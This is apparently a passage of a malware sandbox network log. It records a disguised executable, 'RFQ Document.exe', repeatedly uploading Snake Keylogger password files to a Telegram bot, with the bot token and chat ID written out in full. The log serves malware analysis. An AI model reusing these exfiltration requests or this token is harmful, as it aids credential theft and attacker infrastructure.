2021-09-28 06:00:08 UTC	550	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:08 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:08 UTC	550	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12932,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808808,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
348	192.168.2.4	50185	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:08 UTC	551	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fd86a900 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:08 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 38 36 61 39 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fd86a900Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:08 UTC	552	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:08 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:08 UTC	552	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12933,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808808,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
349	192.168.2.4	50186	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:08 UTC	552	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fda345bf Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:08 UTC	553	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 61 33 34 35 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fda345bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:09 UTC	553	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:09 UTC	554	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12934,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808809,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49811	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:27 UTC	55	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c61c73f5 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:27 UTC	56	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 36 31 63 37 33 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c61c73f5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:27 UTC	56	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:27 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:27 UTC	56	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12616,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
350	192.168.2.4	50187	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:09 UTC	554	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fdc4a9cf Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:09 UTC	554	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 63 34 61 39 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fdc4a9cfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:09 UTC	555	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:09 UTC	555	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12935,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808809,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
351	192.168.2.4	50188	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:09 UTC	556	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fde869e7 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:09 UTC	556	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 65 38 36 39 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fde869e7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:09 UTC	556	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:09 UTC	557	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12936,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808809,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
352	192.168.2.4	50189	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:09 UTC	557	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fe135406 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:09 UTC	558	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 65 31 33 35 34 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fe135406Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:09 UTC	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:09 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:09 UTC	558	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12937,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808809,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49812	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:28 UTC	57	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c6a4595f Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:28 UTC	57	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 36 61 34 35 39 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c6a4595fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:28 UTC	58	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:28 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:28 UTC	58	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 38 2c 22 64 Data Ascii: 